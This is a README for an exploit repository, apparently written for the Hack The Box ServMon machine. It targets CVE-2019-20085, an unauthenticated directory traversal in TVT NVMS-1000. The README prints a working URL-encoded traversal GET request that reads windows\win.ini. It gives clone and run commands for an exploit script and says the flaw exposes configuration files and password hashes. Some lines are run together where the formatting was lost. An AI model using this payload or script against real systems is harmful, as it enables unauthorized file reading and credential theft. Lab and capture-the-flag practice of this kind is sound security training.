
A repository used for Hackthebox ServMon Machine
Author: Z3R0 CVE: CVE-2019-20085 Target: TVT NVMS-1000 (all known versions prior to patch) Vuln Type: Unauthenticated Directory Traversal Date: [Insert Your Release Date]
TVT's NVMS-1000 software contains a directory traversal vulnerability in its web server component. By sending a specially crafted GET request using /.. sequences, an unauthenticated attacker can access arbitrary files on the underlying OS, including sensitive configuration files, password hashes, or system keys.
This exploit abuses the vulnerable file path resolution in the HTTP server running on NVMS-1000. There is no authentication required. A remote attacker can read any file accessible to the service user.
GET /..%5C..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1
Host: <target-ip>:80
C:\Windows\win.ini)requests module (pip install requests)git clone https://github.com/Z3R0-0x30/CVE-2019-20085.git
cd CVE-2019-20085
python3 exploit.py http://domain.local/ ../../windows/win.ini win.ini"
This exploit is released for educational and authorized security research purposes only. The author Z3R0 is not responsible for any misuse or unauthorized access. Always get proper authorization before testing systems.